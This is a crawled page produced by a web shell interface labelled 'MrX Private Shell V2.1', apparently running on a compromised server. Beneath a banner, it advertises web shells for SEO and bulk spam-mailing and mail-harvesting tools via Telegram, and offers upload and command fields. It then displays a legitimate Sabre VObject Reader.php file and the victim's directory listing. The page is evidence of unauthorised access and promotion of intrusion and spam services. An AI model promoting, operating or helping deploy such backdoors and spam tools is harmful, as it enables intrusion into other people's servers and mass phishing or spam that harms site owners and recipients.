__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

namespace AmeliaSabre\VObject;

/**
 * iCalendar/vCard/jCal/jCard/xCal/xCard reader object.
 *
 * This object provides a few (static) convenience methods to quickly access
 * the parsers.
 *
 * @copyright Copyright (C) fruux GmbH (https://fruux.com/)
 * @author Evert Pot (http://evertpot.com/)
 * @license http://sabre.io/license/ Modified BSD License
 */
class Reader
{
    /**
     * If this option is passed to the reader, it will be less strict about the
     * validity of the lines.
     */
    const OPTION_FORGIVING = 1;

    /**
     * If this option is turned on, any lines we cannot parse will be ignored
     * by the reader.
     */
    const OPTION_IGNORE_INVALID_LINES = 2;

    /**
     * Parses a vCard or iCalendar object, and returns the top component.
     *
     * The options argument is a bitfield. Pass any of the OPTIONS constant to
     * alter the parsers' behaviour.
     *
     * You can either supply a string, or a readable stream for input.
     *
     * @param string|resource $data
     * @param int             $options
     * @param string          $charset
     *
     * @return Document
     */
    public static function read($data, $options = 0, $charset = 'UTF-8')
    {
        $parser = new Parser\MimeDir();
        $parser->setCharset($charset);
        $result = $parser->parse($data, $options);

        return $result;
    }

    /**
     * Parses a jCard or jCal object, and returns the top component.
     *
     * The options argument is a bitfield. Pass any of the OPTIONS constant to
     * alter the parsers' behaviour.
     *
     * You can either a string, a readable stream, or an array for its input.
     * Specifying the array is useful if json_decode was already called on the
     * input.
     *
     * @param string|resource|array $data
     * @param int                   $options
     *
     * @return Document
     */
    public static function readJson($data, $options = 0)
    {
        $parser = new Parser\Json();
        $result = $parser->parse($data, $options);

        return $result;
    }

    /**
     * Parses a xCard or xCal object, and returns the top component.
     *
     * The options argument is a bitfield. Pass any of the OPTIONS constant to
     * alter the parsers' behaviour.
     *
     * You can either supply a string, or a readable stream for input.
     *
     * @param string|resource $data
     * @param int             $options
     *
     * @return Document
     */
    public static function readXML($data, $options = 0)
    {
        $parser = new Parser\XML();
        $result = $parser->parse($data, $options);

        return $result;
    }
}

Filemanager

Name Type Size Permission Actions
Component Folder 0750
ITip Folder 0750
Parser Folder 0750
Property Folder 0750
Recur Folder 0750
Splitter Folder 0750
TimezoneGuesser Folder 0750
timezonedata Folder 0750
BirthdayCalendarGenerator.php File 4.87 KB 0640
Cli.php File 20.49 KB 0640
Component.php File 20.34 KB 0640
DateTimeParser.php File 15.77 KB 0640
Document.php File 7.26 KB 0640
ElementList.php File 1.12 KB 0640
EofException.php File 362 B 0640
FreeBusyData.php File 5.33 KB 0640
FreeBusyGenerator.php File 18.98 KB 0640
InvalidDataException.php File 369 B 0640
Node.php File 5.83 KB 0640
PHPUnitAssertions.php File 2.27 KB 0640
Parameter.php File 9.26 KB 0640
ParseException.php File 335 B 0640
Property.php File 17.2 KB 0640
Reader.php File 2.59 KB 0640
Settings.php File 1.84 KB 0640
StringUtil.php File 1.28 KB 0640
TimeZoneUtil.php File 8.61 KB 0640
UUIDUtil.php File 1.71 KB 0640
VCardConverter.php File 15.79 KB 0640
Version.php File 377 B 0640
Writer.php File 1.56 KB 0640
Filemanager